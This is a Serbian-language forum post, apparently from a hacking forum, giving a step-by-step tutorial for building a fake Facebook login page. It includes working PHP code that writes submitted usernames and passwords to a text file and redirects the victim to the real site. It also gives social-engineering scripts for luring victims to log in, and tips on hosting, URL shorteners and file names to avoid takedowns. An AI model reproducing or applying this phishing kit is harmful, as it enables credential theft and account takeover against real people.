Download free full pc game music movie programs
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Download free full pc game music movie programs

Dobrodosli na forum
 
PrijemLatest imagesTražiRegistruj sePristupi

 

 Kako napraviti Facebook Phisher i kako ga uploadovati na FTP

Ići dole 
AutorPoruka
Admin
Admin



Broj poruka : 427
Datum upisa : 18.09.2011

Kako napraviti Facebook Phisher i kako ga uploadovati na FTP Empty
PočaljiNaslov: Kako napraviti Facebook Phisher i kako ga uploadovati na FTP   Kako napraviti Facebook Phisher i kako ga uploadovati na FTP Icon_minitimeUto Nov 01, 2011 11:54 am

Pisher ili lazna login stranica se sastoji iz 3 fajla:

1.Index.html
2.next.php
3.passwords.txt


Savet: *Promenite ime fajlova u bilo sta npr: lol.php,sife.txt da nalozi ne bi bili proveravani i da vam ne zatvore nalog*

Korak 1: Idite na www.facebook.com ili bilo koju stranicu po izboru ne mora ni biti facebook princip je isti.
Korak 2: Desni klik na stranicu - source ( meni je tako posto koristim operu, u Mozilli je view page source)
Korak 3: Select all - i onda copy pa paste u neki txt fajl
Korak 4: Otvorite txt fajl,idite search (ctrl+f ) i trazite Code:
Action=


Automatski ce naci nesto Action="www.facebook.com...itd.itd..." obrisite sve izmedju " " i napisite hehe.php( ili bilo koje vi ime izabrete )- znaci to vam je php fajl
I negde pre ili posle action= imacete liniju teksta gde pise Method=" ovde treba da pise GET "
Code:
method="GET" action="marmun.php"

- kad ste sve uradili ovako treba da vam izgleda... (meni pise marmun , vi stavite sta ocete )

Korak 5: Sacuvajte txt fajl kao index.html : File>Save As > index.html > all files - ovo je vazno da pise all files

Enlarge this image Click to see fullsize






Korak 6: Sada vam treba vas .PHP file, evo vam kod , sacuvajte kao nesto.php ( znaci mora da se zove isto kao sto ste napistali u indexu.html

Korak 7 : Vas.Php kod
Code:
<?php
header("Location:https://www.facebook.com/?ref=home");
$handle = fopen("sifre.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;



Vazno:
Ovde gde pise header vi stavite bilo koj link , meni je to home strana.
Znaci kod pishovanja je vazna prica,kazete nekom lajkuj npr neku grupu na fejsu, posaljete mu pish link , kazete da mora da se uloguje da je verovatno greska ili tako nesto smislite / budite kreativni i onda kad se uloguje namestite link da ga prebaci na tu grupu.
Dosta ljudi samo misli da je neka greska i uloguju se.

Sad vam fali jos password.txt ( ili ponavljam koje god vi ime zelite ) file
Vazno je da napisete bilo sta u njemu posto dosta hostova nece da primi prazan fajl


Kada ste sve to uradili treba da imate 3 fajla na desktopu :
index.php , login.php i password.txt

Moj savet je da nadjete neki ftp host pa da tu uploadujete da se ne bakcete sa ripwayom i ostalim ( fejs i onako blokira linkove ) , ako bas morate koristite t.35.com.

I koristite neki skraceni url / nemojte .tk posto on prijavi hostu i ugase vam nalog...

nadam se da sam sve lepo objasnio i da ce svi razumeti, ako nesto nije jasno pitajte ajde i molim neke komentare
Nazad na vrh Ići dole
https://hackforum.serbianforum.info
 
Kako napraviti Facebook Phisher i kako ga uploadovati na FTP
Nazad na vrh 
Strana 1 od 1
 Similar topics
-
»  Kako uploadovati shell kao sliku
» Kako napraviti blog besplatno
» Kako napraviti free host
» Kako Napraviti Titlove Za Film
»  Kako napraviti free hosting

Dozvole ovog foruma:Ne možete odgovarati na teme u ovom forumu
Download free full pc game music movie programs :: HackForum :: Tutitrujali-
Skoči na: